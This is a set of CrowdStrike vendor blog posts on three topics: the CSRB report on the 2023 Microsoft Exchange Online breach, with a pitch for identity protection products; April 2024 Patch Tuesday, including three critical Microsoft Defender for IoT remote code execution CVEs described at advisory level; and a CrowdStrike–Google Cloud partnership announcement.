Get a free CrowdStrike Identity Security Risk Review to get instant visibility into your current Microsoft Entra ID, Active Directory and Okta environments.

CSRB Report Shows the Importance of Identity Security

The Summer 2023 Microsoft breach deconstructed by the U.S. Cyber Safety Review Board (CSRB) in a recent landmark report of the incident shows why identity threat detection and response is critical. 

Last May, a nation-state adversary compromised the Microsoft Exchange Online mailboxes of 22 organizations and over 500 individuals around the world. The threat actor accessed the accounts using authentication tokens signed by a key that Microsoft had created in 2016. “A single key’s reach can be enormous, and in this case the stolen key had extraordinary power,” said the CSRB. When combined with another flaw in Microsoft’s authentication system, the key allowed the adversary to gain full access to essentially any Exchange Online account anywhere in the world.

The CSRB found “this intrusion was preventable and should never have occurred” and offered several recommendations to ensure an intrusion of this magnitude doesn’t happen again. Two stood out:

1. Cloud service providers should implement modern control mechanisms and baseline practices, informed by a rigorous threat model, across their digital identity and credential systems to substantially reduce the risk of system-level compromise.
2. Cloud service providers should implement emerging digital identity standards to secure cloud services against prevailing threat vectors. Relevant standards bodies should refine, update, and incorporate these standards to address digital identity risks commonly exploited in the modern threat landscape.

While these CSRB recommendations are targeted toward cloud service providers (CSPs), given the Cloud Shared Responsibility Model, customers can’t rely solely on CSPs to stop breaches. Organizations need to lock down identities by layering in proactive identity protections across their hybrid identity environments. 

More recently, COZY BEAR, a Russia state-nexus adversary, conducted high-profile attacks on Microsoft’s corporate systems. This Microsoft breach involved common identity techniques like password spraying and credential scanning, and compromised corporate email accounts, including those of Microsoft’s senior leadership team.

What these two Microsoft identity breaches show is that adversaries are weaponizing identities. If you don’t have modern identity security, your organization may be at risk of a breach. 

New Identity Protections to Stop Breaches in the Cloud

CrowdStrike offers the industry’s only unified platform for identity threat protection and endpoint security, powered by rich threat intelligence and adversary tradecraft. Recent enhancements to CrowdStrike Falcon® Identity Protection help customers better protect against modern identity attacks in the cloud.

While individual IAM and identity-as-a-service (IDaaS) systems provide user authentication, they lack the visibility into hybrid lateral movement and intelligence about adversary tradecraft to detect identity attacks across cloud and on-premises environments. Falcon Identity Protection not only has direct visibility into AD through the lightweight Falcon sensor, it also has pre-configured IDaaS connectors that give customers direct visibility into identity activity across cloud identity providers such as Entra ID and Okta. 

By correlating context from the authentication event, Falcon Identity Protection can detect if a user’s web-authenticated session is maliciously hijacked or other malicious web-based activity has occurred. The solution also provides workflows to take direct action, such as disabling an account, revoking a session and refreshing tokens, and updating the access policy in Entra ID to stop the attack. 

IAM and IDaaS systems are not only blind to cloud identity attacks, but due to their siloed nature they also lack the ability to deliver response actions to stop the adversary in a different cloud identity provider. As an IAM vendor-agnostic solution, Falcon Identity Protection spans multiple cloud identity providers to comprehensively stop adversaries.  

Customers can now defend against sophisticated identity-based threats with CrowdStrike Falcon® Adversary OverWatch’s new identity threat hunting capability. This 24/7 managed service, powered by AI and human expertise, utilizes telemetry from Falcon Identity Protection to disrupt adversaries across endpoint, identity and cloud. 

Take a Free Identity Security Risk Review 

Curious about your identity security posture? CrowdStrike’s complimentary Identity Security Risk Review provides a 1:1 session with a CrowdStrike identity threat expert to help you evaluate your hybrid identity security posture and uncover any potential risks. 

The risk review can be completed quickly and gives you:

• Instant visibility into the identity security posture across your hybrid identity environment
• Deep insights into possible attack paths that adversaries can exploit, and expert advice on how to address them
• An understanding of how to protect your organization from modern identity-based attacks like ransomware, account takeover, hybrid lateral movement and Pass-the-Hash. 

Additional Resources

• Register for a complimentary Identity Security Risk Review.
• Download the Identity Security Risk Review Infographic.
• Stream the “COZY BEAR on the Prowl” CrowdCast
• Visit the Falcon Identity Protection product page to learn more. 
• Watch CrowdStrike CEO George Kurtz explain the recent Microsoft hack on “Mad Money.”

Microsoft has released security updates for 150 vulnerabilities in its April 2024 Patch Tuesday rollout, a much larger amount than in recent months. There are three Critical remote code execution vulnerabilities (CVE-2024-21322, CVE-2024-21323 and CVE-2024-29053), all of which are related to Microsoft Defender for IoT, Microsoft’s security platform for IoT devices. 

April 2024 Risk Analysis

This month’s leading risk type is remote code execution (RCE), accounting for 44%, followed by elevation of privilege (21%) and security feature bypass (19%).

 

Windows products received the most patches this month with 91, followed by Extended Security Update (ESU) with 62 and SQL Server with 38. This represents a consistent uptick in vulnerabilities identified in Extended Support products. In order to ensure the security of endpoints, upgrade to a supported version or purchase Extended Support from the vendor.

Critical Remote Code Execution Vulnerabilities Affect Microsoft Defender for IoT  

CVE-2024-21323 is a Critical RCE vulnerability affecting Microsoft Defender for IoT and has a CVSS score of 8.8. Successful exploitation of this vulnerability would allow an attacker to send malicious update files to the Defender for IoT sensor, allowing the attacker to overwrite any file on the managed asset. This vulnerability requires the attacker to be authenticated into the IoT sensor with just enough permissions to begin the update process. Any IoT device with the Defender sensor deployed should be updated as soon as possible.

CVE-2024-29053 is another Critical RCE vulnerability that affects the Microsoft Defender for IoT platform and has a CVSS score of 8.8. Successful exploitation of this vulnerability could allow an unauthenticated attacker to upload malicious files to sensitive locations on the server appliance. Leveraging this vulnerability, the attacker could override any files including sensitive ones, thereby disrupting normal operation or inhibiting visibility into the IoT network.

CVE-2024-21322 is yet another Critical RCE vulnerability affecting Microsoft Defender for IoT and has a CVSS score of 7.2. Successful exploitation of this vulnerability would allow the attacker to send arbitrary commands to the managed device, possibly impeding normal functioning of the Defender for IoT monitoring software. This vulnerability requires the attacker to be an administrator of the management console of Defender for IoT on the web. Regular audits and validation of such accounts should be performed to limit risk. 

Severity	CVSS Score	CVE	Description
Critical	8.8	CVE-2024-21323	Microsoft Defender for IoT Remote Code Execution Vulnerability
Critical	8.8	CVE-2024-29053	Microsoft Defender for IoT Remote Code Execution Vulnerability
Critical	7.2	CVE-2024-21322	Microsoft Defender for IoT Remote Code Execution Vulnerability

Table 1. Critical vulnerabilities in Microsoft Defender for IoT

Not All Relevant Vulnerabilities Have Patches: Consider Mitigation Strategies

As we have learned with other notable vulnerabilities, such as Log4j, not every highly exploitable vulnerability can be easily patched. As is the case for the ProxyNotShell vulnerabilities, it’s critically important to develop a response plan for how to defend your environments when no patching protocol exists. 

Regular review of your patching strategy should still be a part of your program, but you should also look more holistically at your organization’s methods for cybersecurity to improve your overall security posture. 

The CrowdStrike Falcon® platform regularly collects and analyzes trillions of endpoint events every day from millions of sensors deployed across 176 countries. Watch this demo to see the Falcon platform in action.

Learn More

Learn more about how CrowdStrike Falcon® Exposure Management can help you quickly and easily discover and prioritize vulnerabilities and other types of exposures here.

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article. 

Additional Resources

• For more information on which products are in Microsoft’s Extended Security Updates program, refer to the vendor guidance here.
• Read the CrowdStrike 2024 Global Threat Report to learn how the threat landscape has shifted in the past year and understand the adversary behavior driving these shifts.
• See how Falcon Exposure Management can help you discover and manage vulnerabilities and other exposures in your environments. 
• Learn how CrowdStrike’s external attack surface module, CrowdStrike® Falcon Surface, can discover unknown, exposed and vulnerable internet-facing assets, enabling security teams to stop adversaries in their tracks.
• Learn how CrowdStrike Falcon® Identity Protection products can stop workforce identity threats faster. 
• Make prioritization painless and efficient. Watch how CrowdStrike Falcon® Spotlight enables IT staff to improve visibility with custom filters and team dashboards. 
• Test CrowdStrike next-gen antivirus for yourself with a free trial of CrowdStrike® Falcon Prevent.

CrowdStrike and Google Cloud today debuted an expanded strategic partnership with a series of announcements that demonstrate our ability to stop cloud breaches with industry-leading AI-powered protection. These new features and integrations are built to protect Google Cloud and multi-cloud customers against adversaries that are increasingly targeting cloud environments.

At a time when cloud intrusions are up 75% year-over-year and adversaries continue to gain speed and stealth, organizations must adjust their security strategies to stay ahead. They need a unified security platform that removes complexity and empowers security and DevOps teams. As organizations navigate the evolving threat and technology landscapes, they turn to providers like CrowdStrike for best-in-class protection from code to cloud, delivered through a unified platform.

Today we are announcing that CrowdStrike is bringing industry-leading breach protection with integrated offerings like CrowdStrike Falcon® Cloud Security, CrowdStrike Falcon® Next-Gen SIEM, CrowdStrike Falcon® Identity Protection and CrowdStrike Falcon endpoint protection bundles as preferred vendor products on Google Cloud Marketplace, accelerating time-to-value and our unified platform adoption for all Google Cloud customers. Now, more businesses than ever will have access to industry-leading security to protect their growing environments from the most advanced threats they face.

But that’s not all. CrowdStrike is innovating and leading to address the critical cloud security needs of today’s organizations by empowering them with unified visibility across their cloud environments, industry-leading threat detection and response, the ability to secure the application life cycle and prioritize remediation, and shift-left capabilities to prevent security issues early in development. Together with Google, we’re bringing these benefits to Google Cloud customers to stop breaches and protect their cloud environments from modern threats.

Below are some key announcements we’re excited to make at Google Cloud Next ’24.

Deeper Integrations

CrowdStrike Supports Google Cloud Run: CrowdStrike is providing support for organizations seeking to pair Google Cloud Run with Falcon Cloud Security. Today, we’re announcing deeper integrations and support for Google Cloud Run. Customers using Google Cloud Run to automatically scale containerized workloads and build container images will be able to secure those processes with Falcon Cloud Security, expanding their coverage and gaining world-class security at the speed of DevOps.

CrowdStrike Supports GKE Autopilot: Falcon Cloud Security now supports Google Kubernetes Engine (GKE) Autopilot, a critical automation tool for Kubernetes cluster deployments. Organizations operating with lean teams and resources can use GKE Autopilot and Falcon Cloud Security to identify critical risks, remediate them faster and run their business more efficiently.

Faster Breach Protection 

OS Configuration Support: Falcon Cloud Security will be able to support a single-click agent deployment to customers in Google Cloud with OS Config support. This support provides customers with a simple way to deploy the CrowdStrike Falcon® sensor across Google Cloud workloads for real-time visibility and breach protection in the cloud.

Enhanced Productivity

Falcon Cloud Security Kubernetes Admission Controller: Falcon Cloud Security is now the only cloud security tool on the market with a Kubernetes admission controller as part of a complete code-to-cloud, cloud-native application protection platform (CNAPP). Kubernetes admission controllers simplify the lives of DevSecOps teams by preventing non-compliant containers from deploying and allowing DevSecOps teams to easily stop frustrating crash loops — which cost developers and security teams valuable time — without writing complex Rego rules.

 

Google Workspace Bundles: CrowdStrike is now providing support to secure the millions of customers using the Google Workspace productivity suite with CrowdStrike’s leading endpoint security and next-generation antivirus protection.

CrowdStrike: Built to Protect Businesses in the Cloud

Our expanded strategic alliance with Google marks a significant milestone for cloud security. The powerful combination of AI-powered cloud services from Google Cloud and the unified protection and threat hunting capabilities of the AI-native CrowdStrike Falcon platform provides the security that organizations need to stop breaches in multi-cloud and multi-vendor environments.

As cloud threats and technology continue to evolve, staying ahead of threats is paramount. Modern businesses need a powerful and leading ally to protect their cloud-based resources, applications and data as their reliance on cloud technology continues to grow. This industry-defining synergy between CrowdStrike and Google Cloud — both leaders in their own right — will shape the future of cloud technology and security, setting a new standard for protecting today’s cloud environments.

Additional Resources

• Read the press release to learn more.
• Learn how Falcon Cloud Security can protect your Google Cloud resources.
• See why Forrester named CrowdStrike a Leader in The Forrester Wave: Cloud Workload Security, Q1 2024. 
• Get a free Cloud Security Health Check and experience Falcon Cloud Security in action for yourself.